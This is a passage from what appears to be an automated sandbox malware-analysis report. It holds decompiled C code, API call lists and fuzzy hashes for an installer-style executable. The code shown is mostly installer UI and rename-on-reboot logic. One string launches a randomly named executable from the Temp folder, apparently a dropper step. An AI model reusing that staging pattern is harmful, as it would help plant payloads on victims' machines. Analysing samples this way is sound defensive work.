                                  						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                  							if(_t298 != 0x20) {
                                  								_v20 = 0;
                                  							}
                                  							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406544(_t298, 0, _t326, 0, _t266)), _t298);
                                  						}
                                  						_t298 = _t298 + 1;
                                  					} while (_t298 < 0x21);
                                  					_t299 = _a16;
                                  					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                  					_push(0x15);
                                  					E00404463(_a4);
                                  					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                  					_push(0x16);
                                  					E00404463(_a4);
                                  					_t300 = 0;
                                  					_v16 = 0;
                                  					if( *0x42a24c <= 0) {
                                  						L19:
                                  						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                  						goto L20;
                                  					} else {
                                  						_t319 = _v24 + 8;
                                  						_v32 = _t319;
                                  						do {
                                  							_t278 =  &(_t319[0x10]);
                                  							if( *_t278 != 0) {
                                  								_v64 = _t278;
                                  								_t279 =  *_t319;
                                  								_v88 = _v16;
                                  								_t311 = 0x20;
                                  								_v84 = 0xffff0002;
                                  								_v80 = 0xd;
                                  								_v68 = _t311;
                                  								_v44 = _t300;
                                  								_v72 = _t279 & _t311;
                                  								if((_t279 & 0x00000002) == 0) {
                                  									if((_t279 & 0x00000004) == 0) {
                                  										 *( *0x423700 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                  									} else {
                                  										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                  									}
                                  								} else {
                                  									_v80 = 0x4d;
                                  									_v48 = 1;
                                  									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                  									_v36 = 1;
                                  									 *( *0x423700 + _t300 * 4) = _t284;
                                  									_v16 =  *( *0x423700 + _t300 * 4);
                                  								}
                                  							}
                                  							_t300 = _t300 + 1;
                                  							_t319 =  &(_v32[0x818]);
                                  							_v32 = _t319;
                                  						} while (_t300 <  *0x42a24c);
                                  						if(_v36 != 0) {
                                  							L20:
                                  							if(_v20 != 0) {
                                  								E00404498(_v8);
                                  								goto L23;
                                  							} else {
                                  								ShowWindow(_v12, 5);
                                  								E00404498(_v12);
                                  								L93:
                                  								return E004044CA(_a8, _a12, _a16);
                                  							}
                                  						}
                                  						goto L19;
                                  					}
                                  				}
                                  			}
                                  0x004053d8
                                  0x004053dd
                                  0x004053e4
                                  0x004053e7
                                  0x004053e7
                                  0x004053ee
                                  0x004053fa
                                  0x004053fe
                                  0x00405400
                                  0x00405400
                                  0x004053f0
                                  0x004053f2
                                  0x004053f2
                                  0x00405420
                                  0x0040542c
                                  0x0040543b
                                  0x0040543b
                                  0x0040543d
                                  0x00405440
                                  0x00405449
                                  0x00000000
                                  0x00405350
                                  0x0040535b
                                  0x0040535e
                                  0x00405363
                                  0x00405365
                                  0x00405369
                                  0x00405379
                                  0x00405383
                                  0x00405385
                                  0x00405388
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040536b
                                  0x0040536b
                                  0x00405371
                                  0x00405373
                                  0x00405373
                                  0x00405374
                                  0x00405375
                                  0x00000000
                                  0x0040536b
                                  0x0040534e
                                  0x00405329
                                  0x0040526c
                                  0x00000000
                                  0x00405282
                                  0x0040528c
                                  0x00405291
                                  0x00000000
                                  0x00000000
                                  0x004052a3
                                  0x004052a8
                                  0x004052b4
                                  0x004052b4
                                  0x004052b6
                                  0x004052c5
                                  0x004052c7
                                  0x004052cb
                                  0x004052ce
                                  0x00000000
                                  0x004052ce
                                  0x0040526c
                                  0x00404f22
                                  0x00404f27
                                  0x00404f30
                                  0x00404f37
                                  0x00404f49
                                  0x00404f54
                                  0x00404f5a
                                  0x00404f68
                                  0x00404f7c
                                  0x00404f81
                                  0x00404f8e
                                  0x00404f93
                                  0x00404fa9
                                  0x00404fba
                                  0x00404fc7
                                  0x00404fc7
                                  0x00404fca
                                  0x00404fd0
                                  0x00404fd2
                                  0x00404fd5
                                  0x00404fda
                                  0x00404fdf
                                  0x00404fe1
                                  0x00404fe1
                                  0x00405001
                                  0x00405001
                                  0x00405003
                                  0x00405004
                                  0x00405009
                                  0x0040500f
                                  0x00405013
                                  0x00405018
                                  0x00405020
                                  0x00405024
                                  0x00405029
                                  0x0040502e
                                  0x00405036
                                  0x00405039
                                  0x00405109
                                  0x0040511c
                                  0x00000000
                                  0x0040503f
                                  0x00405042
                                  0x00405045
                                  0x00405048
                                  0x00405048
                                  0x0040504e
                                  0x00405057
                                  0x0040505a
                                  0x0040505e
                                  0x00405061
                                  0x00405064
                                  0x0040506d
                                  0x00405076
                                  0x00405079
                                  0x0040507c
                                  0x0040507f
                                  0x004050bd
                                  0x004050e8
                                  0x004050bf
                                  0x004050ce
                                  0x004050ce
                                  0x00405081
                                  0x00405084
                                  0x00405092
                                  0x0040509c
                                  0x004050a4
                                  0x004050ab
                                  0x004050b6
                                  0x004050b6
                                  0x0040507f
                                  0x004050ee
                                  0x004050ef
                                  0x004050fb
                                  0x004050fb
                                  0x00405107
                                  0x00405122
                                  0x00405125
                                  0x00405142
                                  0x00000000
                                  0x00405127
                                  0x0040512c
                                  0x00405135
                                  0x004054c8
                                  0x004054da
                                  0x004054da
                                  0x00405125
                                  0x00000000
                                  0x00405107
                                  0x00405039

                                  APIs
                                  • GetDlgItem.USER32 ref: 00404EE8
                                  • GetDlgItem.USER32 ref: 00404EF3
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
                                  • LoadImageW.USER32 ref: 00404F54
                                  • SetWindowLongW.USER32 ref: 00404F6D
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
                                  • DeleteObject.GDI32(00000000), ref: 00404FCA
                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC
                                    • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
                                  • GetWindowLongW.USER32(?,000000F0), ref: 0040510E
                                  • SetWindowLongW.USER32 ref: 0040511C
                                  • ShowWindow.USER32(?,00000005), ref: 0040512C
                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
                                  • ImageList_Destroy.COMCTL32(?), ref: 004052FA
                                  • GlobalFree.KERNEL32 ref: 0040530A
                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
                                  • SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
                                  • ShowWindow.USER32(?,00000000), ref: 004054B4
                                  • GetDlgItem.USER32 ref: 004054BF
                                  • ShowWindow.USER32(00000000), ref: 004054C6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                  • String ID: $M$N
                                  • API String ID: 2564846305-813528018
                                  • Opcode ID: 8525e20a0051abda158ee0026944c2010c5087461c76e87d86fd24a5c04b36c4
                                  • Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
                                  • Opcode Fuzzy Hash: 8525e20a0051abda158ee0026944c2010c5087461c76e87d86fd24a5c04b36c4
                                  • Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E00404622(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                  				intOrPtr _v8;
                                  				int _v12;
                                  				void* _v16;
                                  				struct HWND__* _t56;
                                  				signed int _t75;
                                  				signed short* _t76;
                                  				signed short* _t78;
                                  				long _t92;
                                  				int _t103;
                                  				signed int _t110;
                                  				intOrPtr _t113;
                                  				WCHAR* _t114;
                                  				signed int* _t116;
                                  				WCHAR* _t117;
                                  				struct HWND__* _t118;
                                  
                                  				if(_a8 != 0x110) {
                                  					if(_a8 != 0x111) {
                                  						L13:
                                  						if(_a8 != 0x4e) {
                                  							if(_a8 == 0x40b) {
                                  								 *0x4216d4 =  *0x4216d4 + 1;
                                  							}
                                  							L27:
                                  							_t114 = _a16;
                                  							L28:
                                  							return E004044CA(_a8, _a12, _t114);
                                  						}
                                  						_t56 = GetDlgItem(_a4, 0x3e8);
                                  						_t114 = _a16;
                                  						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                  							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                  							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                  							_v12 = _t103;
                                  							_v16 = _t113;
                                  							_v8 = 0x4281c0;
                                  							if(_t103 - _t113 < 0x800) {
                                  								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                  								SetCursor(LoadCursorW(0, 0x7f02));
                                  								_push(1);
                                  								E004048D1(_a4, _v8);
                                  								SetCursor(LoadCursorW(0, 0x7f00));
                                  								_t114 = _a16;
                                  							}
                                  						}
                                  						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                  							goto L28;
                                  						} else {
                                  							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                  								SendMessageW( *0x42a228, 0x111, 1, 0);
                                  							}
                                  							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                  								SendMessageW( *0x42a228, 0x10, 0, 0);
                                  							}
                                  							return 1;
                                  						}
                                  					}
                                  					if(_a12 >> 0x10 != 0 ||  *0x4216d4 != 0) {
                                  						goto L27;
                                  					} else {
                                  						_t116 =  *0x4226e0 + 0x14;
                                  						if(( *_t116 & 0x00000020) == 0) {
                                  							goto L27;
                                  						}
                                  						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                  						E00404485(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                  						E004048AD();
                                  						goto L13;
                                  					}
                                  				}
                                  				_t117 = _a16;
                                  				_t75 =  *(_t117 + 0x30);
                                  				if(_t75 < 0) {
                                  					_t75 =  *( *0x4291fc - 4 + _t75 * 4);
                                  				}
                                  				_t76 =  *0x42a258 + _t75 * 2;
                                  				_t110 =  *_t76 & 0x0000ffff;
                                  				_a8 = _t110;
                                  				_t78 =  &(_t76[1]);
                                  				_a16 = _t78;
                                  				_v16 = _t78;
                                  				_v12 = 0;
                                  				_v8 = E004045D3;
                                  				if(_t110 != 2) {
                                  					_v8 = E00404599;
                                  				}
                                  				_push( *((intOrPtr*)(_t117 + 0x34)));
                                  				_push(0x22);
                                  				E00404463(_a4);
                                  				_push( *((intOrPtr*)(_t117 + 0x38)));
                                  				_push(0x23);
                                  				E00404463(_a4);
                                  				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                  				E00404485( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                  				_t118 = GetDlgItem(_a4, 0x3e8);
                                  				E00404498(_t118);
                                  				SendMessageW(_t118, 0x45b, 1, 0);
                                  				_t92 =  *( *0x42a230 + 0x68);
                                  				if(_t92 < 0) {
                                  					_t92 = GetSysColor( ~_t92);
                                  				}
                                  				SendMessageW(_t118, 0x443, 0, _t92);
                                  				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                  				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                  				 *0x4216d4 = 0;
                                  				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                  				 *0x4216d4 = 0;
                                  				return 0;
                                  			}

                                  APIs
                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
                                  • GetDlgItem.USER32 ref: 004046D4
                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
                                  • GetSysColor.USER32(?), ref: 00404702
                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
                                  • lstrlenW.KERNEL32(?), ref: 00404723
                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
                                  • GetDlgItem.USER32 ref: 0040479E
                                  • SendMessageW.USER32(00000000), ref: 004047A5
                                  • GetDlgItem.USER32 ref: 004047D0
                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404821
                                  • SetCursor.USER32(00000000), ref: 00404824
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
                                  • SetCursor.USER32(00000000), ref: 00404840
                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881
                                  Strings
                                  • N, xrefs: 004047BE
                                  • C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj, xrefs: 004047FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj$N
                                  • API String ID: 3103080414-2756946670
                                  • Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                                  • Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
                                  • Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                                  • Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                  				struct tagLOGBRUSH _v16;
                                  				struct tagRECT _v32;
                                  				struct tagPAINTSTRUCT _v96;
                                  				struct HDC__* _t70;
                                  				struct HBRUSH__* _t87;
                                  				struct HFONT__* _t94;
                                  				long _t102;
                                  				signed int _t126;
                                  				struct HDC__* _t128;
                                  				intOrPtr _t130;
                                  
                                  				if(_a8 == 0xf) {
                                  					_t130 =  *0x42a230;
                                  					_t70 = BeginPaint(_a4,  &_v96);
                                  					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                  					_a8 = _t70;
                                  					GetClientRect(_a4,  &_v32);
                                  					_t126 = _v32.bottom;
                                  					_v32.bottom = _v32.bottom & 0x00000000;
                                  					while(_v32.top < _t126) {
                                  						_a12 = _t126 - _v32.top;
                                  						asm("cdq");
                                  						asm("cdq");
                                  						asm("cdq");
                                  						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                  						_t87 = CreateBrushIndirect( &_v16);
                                  						_v32.bottom = _v32.bottom + 4;
                                  						_a16 = _t87;
                                  						FillRect(_a8,  &_v32, _t87);
                                  						DeleteObject(_a16);
                                  						_v32.top = _v32.top + 4;
                                  					}
                                  					if( *(_t130 + 0x58) != 0xffffffff) {
                                  						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                  						_a16 = _t94;
                                  						if(_t94 != 0) {
                                  							_t128 = _a8;
                                  							_v32.left = 0x10;
                                  							_v32.top = 8;
                                  							SetBkMode(_t128, 1);
                                  							SetTextColor(_t128,  *(_t130 + 0x58));
                                  							_a8 = SelectObject(_t128, _a16);
                                  							DrawTextW(_t128, 0x429220, 0xffffffff,  &_v32, 0x820);
                                  							SelectObject(_t128, _a8);
                                  							DeleteObject(_a16);
                                  						}
                                  					}
                                  					EndPaint(_a4,  &_v96);
                                  					return 0;
                                  				}
                                  				_t102 = _a16;
                                  				if(_a8 == 0x46) {
                                  					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                  					 *((intOrPtr*)(_t102 + 4)) =  *0x42a228;
                                  				}
                                  				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                  			}














                                  APIs
                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                  • BeginPaint.USER32(?,?), ref: 00401047
                                  • GetClientRect.USER32 ref: 0040105B
                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                  • FillRect.USER32 ref: 004010E4
                                  • DeleteObject.GDI32(?), ref: 004010ED
                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                  • DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                  • DeleteObject.GDI32(?), ref: 00401165
                                  • EndPaint.USER32(?,?), ref: 0040116E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                  • String ID: F
                                  • API String ID: 941294808-1304234792
                                  • Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                                  • Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
                                  • Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                                  • Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040614D(void* __ecx) {
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				long _t12;
                                  				long _t24;
                                  				char* _t31;
                                  				int _t37;
                                  				void* _t38;
                                  				intOrPtr* _t39;
                                  				long _t42;
                                  				WCHAR* _t44;
                                  				void* _t46;
                                  				void* _t48;
                                  				void* _t49;
                                  				void* _t52;
                                  				void* _t53;
                                  
                                  				_t38 = __ecx;
                                  				_t44 =  *(_t52 + 0x14);
                                  				 *0x426da8 = 0x55004e;
                                  				 *0x426dac = 0x4c;
                                  				if(_t44 == 0) {
                                  					L3:
                                  					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x4275a8, 0x400);
                                  					if(_t12 != 0 && _t12 <= 0x400) {
                                  						_t37 = wsprintfA(0x4269a8, "%ls=%ls\r\n", 0x426da8, 0x4275a8);
                                  						_t53 = _t52 + 0x10;
                                  						E00406544(_t37, 0x400, 0x4275a8, 0x4275a8,  *((intOrPtr*)( *0x42a230 + 0x128)));
                                  						_t12 = E00405FF7(0x4275a8, 0xc0000000, 4);
                                  						_t48 = _t12;
                                  						 *(_t53 + 0x18) = _t48;
                                  						if(_t48 != 0xffffffff) {
                                  							_t42 = GetFileSize(_t48, 0);
                                  							_t6 = _t37 + 0xa; // 0xa
                                  							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                  							if(_t46 == 0 || E0040607A(_t48, _t46, _t42) == 0) {
                                  								L18:
                                  								return CloseHandle(_t48);
                                  							} else {
                                  								if(E00405F5C(_t38, _t46, "[Rename]\r\n") != 0) {
                                  									_t49 = E00405F5C(_t38, _t21 + 0xa, "\n[");
                                  									if(_t49 == 0) {
                                  										_t48 =  *(_t53 + 0x18);
                                  										L16:
                                  										_t24 = _t42;
                                  										L17:
                                  										E00405FB2(_t24 + _t46, 0x4269a8, _t37);
                                  										SetFilePointer(_t48, 0, 0, 0);
                                  										E004060A9(_t48, _t46, _t42 + _t37);
                                  										GlobalFree(_t46);
                                  										goto L18;
                                  									}
                                  									_t39 = _t46 + _t42;
                                  									_t31 = _t39 + _t37;
                                  									while(_t39 > _t49) {
                                  										 *_t31 =  *_t39;
                                  										_t31 = _t31 - 1;
                                  										_t39 = _t39 - 1;
                                  									}
                                  									_t24 = _t49 - _t46 + 1;
                                  									_t48 =  *(_t53 + 0x18);
                                  									goto L17;
                                  								}
                                  								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                  								_t42 = _t42 + 0xa;
                                  								goto L16;
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					CloseHandle(E00405FF7(_t44, 0, 1));
                                  					_t12 = GetShortPathNameW(_t44, 0x426da8, 0x400);
                                  					if(_t12 != 0 && _t12 <= 0x400) {
                                  						goto L3;
                                  					}
                                  				}
                                  				return _t12;
                                  			}




















                                  APIs
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
                                  • GetShortPathNameW.KERNEL32 ref: 00406191
                                    • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                    • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                  • GetShortPathNameW.KERNEL32 ref: 004061AE
                                  • wsprintfA.USER32 ref: 004061CC
                                  • GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
                                  • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
                                  • GlobalFree.KERNEL32 ref: 004062B5
                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC
                                    • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\4505682666.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                    • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                  • String ID: %ls=%ls$[Rename]
                                  • API String ID: 2171350718-461813615
                                  • Opcode ID: 103a52d89d2190fa92995d585e71df630d47c1fe56f755659e2bb6cae3d098e7
                                  • Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
                                  • Opcode Fuzzy Hash: 103a52d89d2190fa92995d585e71df630d47c1fe56f755659e2bb6cae3d098e7
                                  • Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E00406544(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                  				struct _ITEMIDLIST* _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				signed int _t44;
                                  				WCHAR* _t45;
                                  				signed char _t47;
                                  				signed int _t48;
                                  				short _t59;
                                  				short _t61;
                                  				short _t63;
                                  				void* _t71;
                                  				signed int _t77;
                                  				signed int _t78;
                                  				short _t81;
